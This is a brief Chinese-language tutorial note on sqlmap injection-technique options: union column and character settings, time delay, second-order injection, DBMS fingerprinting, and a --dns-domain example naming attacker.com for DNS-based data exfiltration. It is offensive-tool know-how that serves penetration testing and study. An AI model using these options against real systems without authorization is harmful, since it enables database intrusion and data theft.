1、默认使用的技术
- B: Boolean-based blind
- E: Error-based
- U: Union query-based
- S: Stacked queries(文件系统、操作系统、注册表时必须使用此参数)
- T: Time-based blind
2、选项 --time-sec
- 基于时间的注入检测相应延迟时间(默认为5s)
3、选项 --union-cols
- 默认联合查询1-10列,随--level增加最多支持50列
--union-cols 6-9
4、选项 --union-char
- 联合查询默认使用NULL(如select 1,2,如果不想看第一个字段,使用select null,2),但有些情况下NULL可能失败,此时需要手动指定此值
--union-char 123 //用此时替换null
5、选项 --dns-domain
*使用此参数的前提是攻击者已经控制了某DNS服务器,使用此功能可以提高数据榨取的速度
--dns-domain attacker.com
6、选项 --second-order
- 在一个页面注入的结果,从另一个页面体现出来
--second-order http://1.1.1.1/b.php
//此处的1.1.1.1是注入成功后返回的第二个页面
7、选项-f,--fingerprint,-b,--banner
- 数据库管理系统指纹信息
- DBMS、操作系统、架构、补丁
网友评论